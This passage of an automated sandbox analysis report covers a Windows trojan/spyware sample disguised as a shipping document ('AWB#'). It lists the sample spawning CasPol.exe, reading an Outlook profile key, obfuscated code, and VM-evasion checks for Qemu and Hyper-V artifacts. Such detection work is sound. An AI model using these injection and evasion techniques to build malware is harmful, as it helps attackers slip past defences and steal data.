            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB4187
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA7DCA
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA61CC
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA0DC4
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAB1DA
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA61DE
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA6534
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAB10E
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AABD78
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AABD4E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1D809890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1D806B70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1D80A160
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1D809548
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_20C8DC00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_20C88418
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_20C8D028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_20C8B150
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_20C82730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_20D0CDF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_20D07AC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_20D0329D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_20D02EB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_20D00040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_20D0C568
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_20D086C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_20D086F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_20D0EAA8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_20D08708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_21075860
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 20C856C0 appears 32 times
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB4A72 LdrLoadDll,NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB6BCD NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB7B67 NtResumeThread,
            Source: AWB# 6174229350.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: AWB# 6174229350.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
            Source: AWB# 6174229350.exeStatic PE information: invalid certificate
            Source: AWB# 6174229350.exeVirustotal: Detection: 22%
            Source: AWB# 6174229350.exeReversingLabs: Detection: 14%
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeFile read: C:\Users\user\Desktop\AWB# 6174229350.exeJump to behavior
            Source: AWB# 6174229350.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\AWB# 6174229350.exe "C:\Users\user\Desktop\AWB# 6174229350.exe"
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\AWB# 6174229350.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\AWB# 6174229350.exe"
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeFile created: C:\Users\user\Music\KappendeJump to behavior
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeFile created: C:\Users\user\AppData\Local\Temp\nso3AA4.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/9@3/3
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_00402173 CoCreateInstance,MultiByteToWideChar,
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_00404766 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4036:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4036:304:WilStaging_02
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Bridie\MilieuteknikeresJump to behavior
            Source: AWB# 6174229350.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000001.00000002.83744400441.0000000002AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.83392924603.0000000001300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB3625 pushfd ; retf
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB4A72 pushfd ; retf
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB2BBD pushfd ; retf
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA3F74 push ecx; ret
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA504E push esp; retf
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA5E88 push ebp; ret
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA2AC6 push ebx; iretd
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB46D5 pushfd ; retf
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA2A0E push ebx; iretd
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA2E14 pushfd ; retf
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA367B push 8F4EAAACh; iretd
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA2A40 push ebx; iretd
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA7646 pushfd ; retf
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA425F push ebx; ret
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAA32B push ds; retf
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAAF32 pushfd ; retf
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAA377 push ebp; iretd
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB2746 pushfd ; retf
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB58A6 pushfd ; retf
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAC4B8 push esp; iretd
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAAC9E pushfd ; retf
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA34D9 push esp; ret
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA904D push ss; iretd
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAD455 push es; ret
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA75AC pushfd ; retf
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB4187 pushfd ; retf
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA99E3 push ebx; retf
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA2DCD pushfd ; retf
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAD5C0 push ds; iretd
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAD575 push 60D82AA9h; ret
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AABD4E pushfd ; retf
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_6FCB1B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeFile created: C:\Users\user\AppData\Local\Temp\nsb414D.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Source: AWB# 6174229350.exe, 00000001.00000002.83744610285.0000000002BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOKERNELBASE.DLLSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
            Source: AWB# 6174229350.exe, 00000001.00000002.83744610285.0000000002BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2052Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA02A6 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9623
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_004065CE FindFirstFileA,FindClose,
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_004027AA FindFirstFileA,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeSystem information queried: ModuleInformation
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeAPI call chain: ExitProcess graph end node
            Source: AWB# 6174229350.exe, 00000001.00000002.83744908344.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88257484243.0000000003149000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: AWB# 6174229350.exe, 00000001.00000002.83744908344.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88257484243.0000000003149000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: AWB# 6174229350.exe, 00000001.00000002.83744610285.0000000002BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoKERNELBASE.DLLshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
            Source: CasPol.exe, 00000003.00000002.88257484243.0000000003149000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: AWB# 6174229350.exe, 00000001.00000002.83744908344.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88257484243.0000000003149000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: AWB# 6174229350.exe, 00000001.00000002.83744908344.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88257484243.0000000003149000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: AWB# 6174229350.exe, 00000001.00000002.83744908344.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88257484243.0000000003149000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 00000003.00000002.88257484243.0000000003149000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000003.00000003.84840662617.000000000168F000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88255578225.0000000001690000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88256452389.00000000016E6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.84839518510.00000000016E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: AWB# 6174229350.exe, 00000001.00000002.83744610285.0000000002BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: AWB# 6174229350.exe, 00000001.00000002.83744908344.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88257484243.0000000003149000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: AWB# 6174229350.exe, 00000001.00000002.83744908344.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88257484243.0000000003149000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: AWB# 6174229350.exe, 00000001.00000002.83744908344.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88257484243.0000000003149000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: CasPol.exe, 00000003.00000002.88257484243.0000000003149000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_6FCB1B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA02A6 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAB7C8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AABBDC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAAF32 mov eax, dword ptr fs:[00000030h]
